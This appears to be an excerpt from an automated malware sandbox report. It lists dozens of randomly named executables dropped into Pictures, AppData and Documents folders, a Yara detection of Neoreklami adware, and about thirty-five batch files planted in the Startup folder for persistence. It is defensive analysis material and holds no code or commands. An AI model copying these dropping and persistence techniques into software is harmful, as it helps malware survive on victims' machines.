Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\zl9WjeKTxMy8k8EbTBZdpElC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\VEH3hOo7SH8Curivn14XA2XL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\cbVkxkkdr6gAwr3ezrvUlIvw.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\QAuG4M9OCXilplKuXEar6ygd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\oZEH3cHEU5SysFjbUbbRDrah.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\0xzSXfvcS_VEarTqOdaPs4ts.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\GEHqSaIn1rPu3OTaMO2vs7UL.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\o2i3jroi23joj23ikrjokij3oroi[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\zPFKv97tg3hm10kOTWpULC1K.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\5FLQaCVJzPf4A255tfj9dVCh.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\j19ppip6hQlQefTQJUWb1E5Y.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\3wIIRe1QiHmGmyDfkt1MdfjR.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\04MMWMll6oQNYP44niQAKG8f.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\timeSync[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\xCrl2X_yjihZJLjlfNXcaGsm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\iuDvaF9Di8V3GPfVdVsLOQc6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\IMmyv1eSkv8WoF4sKRLh3j87.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\vzNIVOaxf0vNgO94DAC9jWgi.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\crt[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\bash.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\b7ii2eIKHIFqIN8jVgqT5jFD.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\1j9R8lifNJQPOos8jChy96bC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\Vv3eq95tJE23PC8aGlGuTOwU.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\ED0F.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\O6FJxszjCn1zgUzc3ngkew5Q.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\PkqGBlFfXQGSePxTvCIfv7cw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\xCvbsgibKaoe0JrKdFZUHTO3.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\iWX2pBM7OP8AKRlxpYxKCjxp.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\H0hJPxhIO3F6BQNxVzuoHmfd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\EXHYoUWbk2EtGfzPiFxOh4fX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\gX97xQ1DxOEiWzmKIb4DOJWg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\Lxz6buRp1tzgPd3mYM1t5mGJ.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\GLt6qc3E5xlMIXJ9xyvvME0a.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\A6Q2KMdnce3aBm1K21Xc0zdR.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\niko[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\AppData\Local\Temp\{F0567900-3BBD-4439-A130-BA90A759BDE5}.tmp\360P2SP.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\oabRgCI78gjFIFXr0JEwCrFT.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hvfsedh	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\i3ScmbyFMAYvi3d3SI8x4eUU.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\rCs1RclDFMYQLymrwE3zboPd.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\FFE8.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\AFlhDPRBYXSdsXlIscLwpPBI.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\IzXa7ArplEUILx8JLGVvIms1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\qoBVbpyFWm3cPk1EQ0W4FQFR.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\PBZVagSpvy50LOBQHCjW6qX9.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\Y01cK2OJgtSKgzCj2OAQkixL.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\7uuYOubuRuTeu2Z5aoCcHRqr.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\oNUrhYTToLZiF7IoGm0L0Ir9.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\notepad.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\z7qYuSNnmN1T20mVDPQyJKNf.exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe.P2P	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\XxYZdepnteJj9ehuEwVshtV3.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\pkc9Yy7eyXDNxjrdaLkXC1Nw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\hmtNBhlQWScQGAc2r9fH2laz.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\3jK_1xVb8VV_A9ZblPqH0VLP.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\M5ZhHB9e1LKNIZlvmmjrpriI.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\atieah64.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\JJ5skLlHHCJQmKA3fqFEF8WX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\8ew1ueXT5mhwmZG4bTyHf7GY.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\m1SrljFNqYeH3vArtbYAaVjK.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\COdFyPiBcHZ6gr6RgSEauTsj.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\xHjBfoMXM1Bms4i9lirVpf5B.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\w0LUzqfajtYxxu1NAEZFwfRY.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\v0F2dmnMQ8GuOxPTeGs09I9Y.exe	Jump to dropped file
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	File created: C:\Users\user\lgX7lgUL1w.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\8uJfLKd9Ss22grd4NZfs8ESc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\bVGflEGYToK4vU6iMb86uQ6v.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\auditpol.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup294[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\Y8VzUT8xWp3WAsPKChchuKQ1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\6up3Hll278RsXeDsUnv7AmsU.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\OZYSp_SuS64TdEhCce9XJabD.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\LAD11vkv57kHfnlhAFxxWdEz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\aqGWEPmkK0B9sJyfEBtpOpuJ.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\rKeuCT5BtcDJi3xnRhdYBXJ0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\JRzNWYaVkGhoqBVKINyNWHZb.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\ByzLwX6bBzV9uMer6vLaibLq.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\oURwiane2EFilQ46IVStlZR3.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

File created: C:\Users\user\lgX7lgUL1w.exe

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe.P2P			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hvfsedh			Jump to dropped file

Boot Survival

Yara detected Neoreklami

Source: Yara match

File source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

File created: C:\Users\user\lgX7lgUL1w.exe

Jump to dropped file

Drops script or batch files to the startup folder

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CpI1BxUwX4GXv0UQgqj98YFq.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dH9ICyXokcwnq5IDiow3vkKB.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Ub2k1IJ2t5gUNZveaJnsLim.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfz7DVXioZ89NNQKMlyzk5D1.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uM7NrUar2CHMPPLhTaEGJaiv.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9KovXimwlIyW3P77uFXo41ye.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TH2edQjI5N96cctLqxcxRWB4.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tEJmB2nPjyQy45rj4ea5hhl3.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lRYDXj1XORWa1yGwgqL1xUtR.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BsDz5LTErOmd8yNfyBTmMVUZ.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gov6rjgDZRJhjjWExECEmd4R.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsh82zoYXoBpPEndu5XVvQbj.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fDdDwjmSMhosQx3rLX3Nv89G.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mttZ30v22cES8SbTv1OgQiYx.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tYY0jrXY77oGwO5gH1VTslTu.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ixTCqmFJu5C2WAuYjLa75esH.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzhtqiaIEnooSzQ58KPkDsXr.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WfwAozSpYoRh0VfEDamYiBsR.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4lG8OjDaPfGRBHmxDRRVnuFX.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsGva5E6VHjdUQqf5f96rHfC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2zxQMcxXAdjZW6YdcXWRkkOC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7TQPiLaiOp4J0vvxRaQJgnEq.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8acF06oTPket8RN9OHo9AhQC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LD4hNojEUEziyKrYgWhQk5rm.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\txcp0mnex1Rnt92zIdFfbI0y.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w7u98nz6M4xUaPLHp2FQ8cKh.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YnNYj3NsWtyv1mUxqNvcXDCG.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NF17SuJC2X4gjmjhKys98Qxu.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QiP2pWLr6NBQvOLbwQTTyn6C.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BWeUEkKv96FAORobAHCW6ypF.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OiFswMERSIM5QYpzdzXs8HqN.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wgc7DyRQRZGZ91fWhoYDAYbz.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4NTnGOUpjOPuN9Xvi5JMQBJ.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7uBTIqAI4TFaoTgWHqBwwXI.bat	Jump to dropped file
